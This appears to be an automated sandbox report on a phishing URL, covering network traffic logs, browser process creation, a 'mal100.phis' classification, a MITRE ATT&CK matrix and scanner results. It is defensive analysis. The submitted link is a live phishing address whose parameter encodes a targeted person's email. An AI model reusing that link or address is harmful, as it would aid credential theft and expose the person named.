cfL4;desc="?proto=TCP&rtt=105110&min_rtt=105000&rtt_var=22346&sent=7&recv=9&lost=0&retrans=2&sent_bytes=3174&recv_bytes=1947&delivery_rate=2891&cwnd=220&unsent_bytes=0&cid=c21084fe83929d1f&ts=2073&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 17:39:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dbehx0K6lkyS293E6RY708YsiligU9Njh%2FPR9VxXMpfLiGho8QgEOFDOUYCkxi%2F1Dtj1cjzwtAdY%2B%2BgKk9tzsu4rnkODyI5BSlpEhjA8LBp9lbVa6tcxn9kp%2BrVG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=42983&min_rtt=42980&rtt_var=16125&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2049&delivery_rate=66215&cwnd=252&unsent_bytes=0&cid=bef93398755cd85f&ts=247&x=0"Server: cloudflareCF-RAY: 92602ffda8430f81-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=104296&min_rtt=103766&rtt_var=22434&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1712&delivery_rate=35897&cwnd=242&unsent_bytes=0&cid=aedbb9b08c3d6bf4&ts=674&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 17:39:27 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUtwJWg00qhsGM5DbAPzDwxeH%2FNES%2FtZn05%2F2LBcsgpl6NC2e78c%2BJnppbYViy%2BGaJLTFkmfDd7oOnSg4uTC6H0BrvfNU0HEC0P%2Fj%2BGpK2aS037cwH3GyQ4DuRP6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=40444&min_rtt=40439&rtt_var=15168&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2056&delivery_rate=70427&cwnd=252&unsent_bytes=0&cid=ba95d2e176da06b2&ts=241&x=0"Server: cloudflareCF-RAY: 9260300dbd1b88c3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=111353&min_rtt=107000&rtt_var=28152&sent=7&recv=8&lost=0&retrans=1&sent_bytes=3176&recv_bytes=1719&delivery_rate=2696&cwnd=248&unsent_bytes=0&cid=25d5e7a9fd8210d9&ts=1118&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 17:39:30 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=22hOFB7CIFEFu9SiZUNocL6zZPK9xkzKMEulUUu0qqqhPcq0clsEu6RVV2l2rDLcS4J1W6%2FfIef27rz909fgmWdw1YgyzfyIOzuEEl7iveezol9sstVbH5rvtQKb"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=40247&min_rtt=40160&rtt_var=15122&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2067&delivery_rate=70916&cwnd=252&unsent_bytes=0&cid=a42d2becfa348c76&ts=246&x=0"Server: cloudflareCF-RAY: 926030240a20b9c6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106893&min_rtt=105501&rtt_var=23658&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1731&delivery_rate=35262&cwnd=238&unsent_bytes=0&cid=298e0229f9d65451&ts=669&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 25 Mar 2025 17:39:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vxu7lV1e1jLQ4kXGXbykmdErz9twWeB8sH0m8SYSLxrTePiaDjv%2B%2BMlvaAW6F9yaC091zCYpfxTI3otR6Rp4UjfLDzfmfAwvF1yOm8A1RK5k%2Ffz7chVJ1GD0AH1S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}server-timing: cfL4;desc="?proto=TCP&rtt=37328&min_rtt=37188&rtt_var=14046&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2069&delivery_rate=76583&cwnd=252&unsent_bytes=0&cid=26e011c986e384bf&ts=235&x=0"Server: cloudflareCF-RAY: 92603083ca584283-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=106677&min_rtt=105449&rtt_var=23553&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1731&delivery_rate=34110&cwnd=245&unsent_bytes=0&cid=517cf2594a8687d4&ts=652&x=0"
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownHTTPS traffic detected: 108.167.188.184:443 -> 192.168.2.16:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 108.167.188.184:443 -> 192.168.2.16:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 192.185.195.216:443 -> 192.168.2.16:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.16:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 208.80.154.240:443 -> 192.168.2.16:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.16:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 207.174.26.219:443 -> 192.168.2.16:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 208.80.154.240:443 -> 192.168.2.16:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.251.32.100:443 -> 192.168.2.16:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.89.181:443 -> 192.168.2.16:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.89.181:443 -> 192.168.2.16:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.195.178:443 -> 192.168.2.16:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.16:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.190.141:443 -> 192.168.2.16:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49755 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 140.82.112.3:443 -> 192.168.2.16:49765 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49766 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.91:443 -> 192.168.2.16:49768 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49770 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.16:49771 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49798 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49800 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.84.132:443 -> 192.168.2.16:49801 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49804 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.193.83:443 -> 192.168.2.16:49805 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49803 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49806 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49807 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.89.181:443 -> 192.168.2.16:49810 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49822 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49823 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir2016_101557337
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir2016_101557337
              Source: classification engineClassification label: mal100.phis.evad.win@26/42@57/286
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2008,i,10574818698735193686,9901850112885567068,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20="
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2008,i,10574818698735193686,9901850112885567068,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2200 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 1.16.d.script.csv, type: HTML
              Source: Yara matchFile source: 2.27..script.csv, type: HTML
              Source: Yara matchFile source: 2.28..script.csv, type: HTML
              Source: Yara matchFile source: 2.7.pages.csv, type: HTML
              Source: Yara matchFile source: 2.8.pages.csv, type: HTML
              Source: Yara matchFile source: 2.9.pages.csv, type: HTML

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		Valid AccountsWindows Management Instrumentation1
              Browser Extensions              		1
              Process Injection              		12
              Masquerading              		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting              		1
              Extra Window Memory Injection              		1
              Process Injection              		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion              		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Extra Window Memory Injection              		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              Screenshots

              Download Video

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              https://ossin7fot.pelosfilhos.com.br?hbyf=YW5nZWxhLm0ucm9lbGxAeGNlbGVuZXJneS5jb20=0%Avira URL Cloudsafe

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7qi3r/0x4AAAAAAA_djh0yNsYo2DnW/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
